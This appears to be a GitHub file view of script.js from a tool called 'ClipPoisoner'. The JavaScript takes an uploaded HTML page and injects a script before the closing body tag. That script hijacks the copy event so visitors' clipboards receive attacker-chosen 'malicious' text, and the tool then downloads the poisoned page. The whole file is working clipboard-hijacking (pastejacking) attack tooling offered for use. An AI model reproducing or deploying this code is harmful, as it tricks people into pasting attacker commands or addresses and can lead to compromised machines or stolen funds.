-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathscript.js
More file actions
48 lines (39 loc) · 1.39 KB
/
script.js
File metadata and controls
48 lines (39 loc) · 1.39 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
// JavaScript File for ClipPoisoner
// Author - WireBits
function handleFileSelect(event){
var file = event.target.files[0];
var reader = new FileReader();
reader.onload = function(event) {
document.getElementById('htmlArea').value = event.target.result;
};
reader.readAsText(file);
}
function triggerFileInput(){
document.getElementById('fileInput').click();
}
function injectAndDownload(){
var htmlContent = document.getElementById('htmlArea').value;
var maliciousText = document.getElementById('maliciousArea').value;
var script = `
<script>
document.addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain', '${maliciousText}');
e.preventDefault();
});
</script>
`;
var modifiedHtmlContent = htmlContent.replace(/<\/body>/, script + '</body>');
var blob = new Blob([modifiedHtmlContent], { type: 'text/html' });
var url = URL.createObjectURL(blob);
var a = document.createElement('a');
a.href = url;
a.download = 'InjectedContent.html';
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
URL.revokeObjectURL(url);
}
function resetTextArea(){
document.getElementById("htmlArea").value = '';
document.getElementById("maliciousArea").value = '';
}